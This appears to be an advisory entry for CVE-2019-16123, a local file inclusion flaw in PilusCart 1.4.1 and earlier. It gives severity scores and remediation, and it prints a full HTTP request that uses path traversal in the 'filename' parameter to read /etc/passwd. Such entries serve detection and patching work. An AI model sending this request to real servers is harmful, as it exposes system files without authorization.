| Title | PilusCart <=1.4.1 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. |
| Remediation | Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.36652 |
| CVE ID | CVE-2019-16123 |
| CWE ID | CWE-22 |
| Tags | cve cve2019 piluscart lfi packetstorm edb kartatopia vuln |
PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16123.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-16123.pcap
N/AN/A